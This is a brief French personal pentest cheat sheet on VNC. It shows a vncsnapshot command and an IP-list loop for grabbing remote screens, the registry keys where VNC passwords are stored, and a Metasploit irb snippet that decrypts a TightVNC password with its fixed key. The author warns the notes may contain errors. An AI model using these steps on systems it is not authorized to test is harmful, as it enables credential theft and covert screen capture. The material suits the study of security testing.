Hacking Wiki

Notes persos. Il y a probablement beaucoup d'erreurs donc privilégiez des sources plus fiables.

View on GitHub

VNC

Prendre un screenshot via VNC:

# Le fichier vncpasswd.txt peut être généré avec l'outil vncpasswd
vncsnapshot -passwd vncpasswd.txt 192.168.100.100 out

Avec une boucle

while read ip; do vncsnapshot -passwd ../vncpasswd.txt $ip screen2_$ip; done < ../vnc.list

On peut retrouver le mot de passe VNC dans certaines clés de registre:

\HKEY_LOCAL_MACHINE\SOFTWARE\TigerVNC\WinVNC4
\HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server
\HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default
\HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\
\HKEY_CURRENT_USER\Software\TightVNC
\HKEY_CURRENT_USER\Software\TurboVNC
\HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password
\HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3\Password

TightVNC

Pour déchiffrer un mot de passe TighVNC (Source https://github.com/frizb/PasswordDecrypts)

msf5 > irb
[*] Starting IRB shell...
[*] You are in the "framework" object

irb: warn: can't alias jobs from irb_jobs.
>> fixedkey = "\x17\x52\x6b\x06\x23\x4e\x58\x07"
>> require 'rex/proto/rfb'
=> true
>> Rex::Proto::RFB::Cipher.decrypt ["YOUPASSWORDHEYRE"].pack('H*'), fixedkey
=> "DecryptedString"
>> exit

Références